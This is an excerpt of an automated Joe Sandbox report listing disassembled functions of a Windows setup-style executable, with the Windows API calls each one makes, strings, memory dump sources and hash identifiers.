                                                                                • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                                • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                                Function 0045C5C8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                • FlushFileBuffers.KERNEL32(?), ref: 0045C7FD
                                                                                Strings
                                                                                • EndOffset range exceeded, xrefs: 0045C731
                                                                                • NumRecs range exceeded, xrefs: 0045C6FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: File$BuffersFlush
                                                                                • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                • API String ID: 3593489403-659731555
                                                                                • Opcode ID: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
                                                                                • Instruction ID: 42c6ccb15965a4bc01c0ab80d29458e35b3cecf9486565f2d0e9c4cbdba5a9bf
                                                                                • Opcode Fuzzy Hash: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
                                                                                • Instruction Fuzzy Hash: A5617134A002988FDB24DF25C891AD9B7B5EF49305F0084DAED89AB352D774AEC9CF54
                                                                                Function 00498578 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498586), ref: 0040334B
                                                                                  • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498586), ref: 00403356
                                                                                  • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                                                  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                  • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                                                  • Part of subcall function 00409B88: 6F9C1CD0.COMCTL32(0049859A), ref: 00409B88
                                                                                  • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                                  • Part of subcall function 00419050: GetVersion.KERNEL32(004985AE), ref: 00419050
                                                                                  • Part of subcall function 0044F754: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                                                  • Part of subcall function 0044F754: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                                                  • Part of subcall function 0044FBFC: GetVersionExA.KERNEL32(0049B790,004985C7), ref: 0044FC0B
                                                                                  • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                                                  • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                                                  • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                                                  • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                                                  • Part of subcall function 00456EEC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                                                  • Part of subcall function 00464960: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                                                  • Part of subcall function 00464960: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                                                  • Part of subcall function 0046D098: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                                                  • Part of subcall function 00478B3C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                                                  • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                                                  • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                                                  • Part of subcall function 00495584: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049559D
                                                                                • SetErrorMode.KERNEL32(00000001,00000000,0049863C), ref: 0049860E
                                                                                  • Part of subcall function 00498338: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                                                  • Part of subcall function 00498338: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                                                  • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                                  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                • ShowWindow.USER32(?,00000005,00000000,0049863C), ref: 0049866F
                                                                                  • Part of subcall function 00482050: SetActiveWindow.USER32(?), ref: 004820FE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                • String ID: Setup
                                                                                • API String ID: 504348408-3839654196
                                                                                • Opcode ID: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                                                • Instruction ID: d131c851e578025af209eb9e9c2d0e6aaf1cfb04eb4cc82699b843ce611002a7
                                                                                • Opcode Fuzzy Hash: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                                                • Instruction Fuzzy Hash: 5C31D4702046409ED601BBBBED5352E3B98EB8A718B61487FF804D6553CE3D6C148A3E
                                                                                Function 00453A10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A56
                                                                                • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A5F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID: .tmp
                                                                                • API String ID: 1375471231-2986845003
                                                                                • Opcode ID: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                                                • Instruction ID: fcbeb811eea92760dd82faa40bdacdd366465f8a5342b7af386d3ee3900427bd
                                                                                • Opcode Fuzzy Hash: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                                                • Instruction Fuzzy Hash: 5A213375A00208ABDB01EFA1C8429DEB7B9EB48305F50457BE801B7342DA789F058AA5
                                                                                Function 0047C310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C596,00000000,0047C5AC,?,?,?,?,00000000), ref: 0047C372
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: RegisteredOrganization$RegisteredOwner
                                                                                • API String ID: 3535843008-1113070880
                                                                                • Opcode ID: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                                                • Instruction ID: cd6b81515cbcb541a42d20c803a6709c30f964b406f28b15d8fe69fce277d2ff
                                                                                • Opcode Fuzzy Hash: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                                                • Instruction Fuzzy Hash: 41F09030704204ABEB00D669ECD2BAA33A99746304F60C03FA9088B392D6799E01CB5C
                                                                                Function 004754BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754E1
                                                                                • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754F8
                                                                                  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateErrorFileHandleLast
                                                                                • String ID: CreateFile
                                                                                • API String ID: 2528220319-823142352
                                                                                • Opcode ID: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                                                • Instruction ID: 40e201e46ebb19b1d9bf90fbf766f72b309683208074062896c4944ddf319cda
                                                                                • Opcode Fuzzy Hash: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                                                • Instruction Fuzzy Hash: CDE065702403447FDA10F769CCC6F4577889B14729F10C155B5446F3D2C5B9EC408628
                                                                                Function 0042DE2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID: System\CurrentControlSet\Control\Windows$c6H
                                                                                • API String ID: 71445658-1548894351
                                                                                • Opcode ID: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                                                • Instruction ID: b14c86e398362f8621ba381b59967aff518ca924b2daa5b46ce173f8349262a2
                                                                                • Opcode Fuzzy Hash: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                                                • Instruction Fuzzy Hash: BFD0C772950128BBDB00DA89DC41DFB775DDB15760F45441BFD049B141C1B4EC5197F8
                                                                                Function 00456EEC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00456E7C: CoInitialize.OLE32(00000000), ref: 00456E82
                                                                                  • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                  • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                • API String ID: 2906209438-2320870614
                                                                                • Opcode ID: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                                                • Instruction ID: 6d1f0b9ea2f83cf17b9d56af39d37ffc4890966232cc80b75afa5f9be50b51f8
                                                                                • Opcode Fuzzy Hash: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                                                • Instruction Fuzzy Hash: 97C04CA1B4169096CB00B7FAA54361F2414DB5075FB96C07FBD40BB687CE7D8848AA2E
                                                                                Function 0046D098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                  • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressErrorLibraryLoadModeProc
                                                                                • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                • API String ID: 2492108670-2683653824
                                                                                • Opcode ID: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                                                • Instruction ID: 608de25eae135e4754017d8cf95b07e3007941af04aa8fd5541e4ba3120ba520
                                                                                • Opcode Fuzzy Hash: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                                                • Instruction Fuzzy Hash: 69B092E0F056008ACF00A7F6984260A10059B8071DF90807B7440BB395EA3E840AAB6F
                                                                                Function 0044853C Relevance: 4.7, APIs: 3, Instructions: 151libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448719), ref: 0044865C
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 2574300362-0
                                                                                • Opcode ID: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                                                • Instruction ID: bcb50df029510264ac3c8269deb9aca16d778d72fab4f9fb4f479d94b6d7f3fe
                                                                                • Opcode Fuzzy Hash: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                                                • Instruction Fuzzy Hash: 09514170A00105AFDB40EFA5C491A9EBBF9EB54315F11817EA414BB392DA389E05CB99
                                                                                Function 00481704 Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemMenu.USER32(00000000,00000000,00000000,0048183C), ref: 004817D4
                                                                                • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 004817E5
                                                                                • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 004817FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Append$System
                                                                                • String ID:
                                                                                • API String ID: 1489644407-0
                                                                                • Opcode ID: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                                                • Instruction ID: b36482c1273671328963914ac1a7ecaae55131090c894365c145815d0470a156
                                                                                • Opcode Fuzzy Hash: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                                                • Instruction Fuzzy Hash: 02318E307043445AD721FB359D82BAE3A989B15318F54593FB900AA3E3CA7C9C4A87AD
                                                                                Function 004524FC Relevance: 4.6, APIs: 3, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • 751C1520.VERSION(00000000,?,?,?,004972D0), ref: 0045251C
                                                                                • 751C1500.VERSION(00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452549
                                                                                • 751C1540.VERSION(?,004525C0,?,?,00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452563
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: C1500C1520C1540
                                                                                • String ID:
                                                                                • API String ID: 1315064709-0
                                                                                • Opcode ID: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                                                • Instruction ID: b47a7e64509d5cca070909842564d4f4e78a1d1ae8fea26b0cdd83eea50adb12
                                                                                • Opcode Fuzzy Hash: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                                                • Instruction Fuzzy Hash: 6B218371A00148AFDB01DAA989519AFB7FCEB4A300F55447BFC00E3342E6B99E04CB65
                                                                                Function 0042440C Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                                • TranslateMessage.USER32(?), ref: 0042449F
                                                                                • DispatchMessageA.USER32(?), ref: 004244A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Message$DispatchPeekTranslate
                                                                                • String ID:
                                                                                • API String ID: 4217535847-0
                                                                                • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                                • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                                Function 00416654 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                                • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Prop$Window
                                                                                • String ID:
                                                                                • API String ID: 3363284559-0
                                                                                • Opcode ID: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                                                • Instruction ID: 2262f6f032fbfc8c948eb6af5e1566575da4c35a9ecfa624f63ddadf83d7b404
                                                                                • Opcode Fuzzy Hash: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                                                • Instruction Fuzzy Hash: E3F0B271701210ABD710AB599C85FA632DCAB09719F160176BD09EF286C778DC40C7A8
                                                                                Function 0041EE64 Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                                • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                                • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
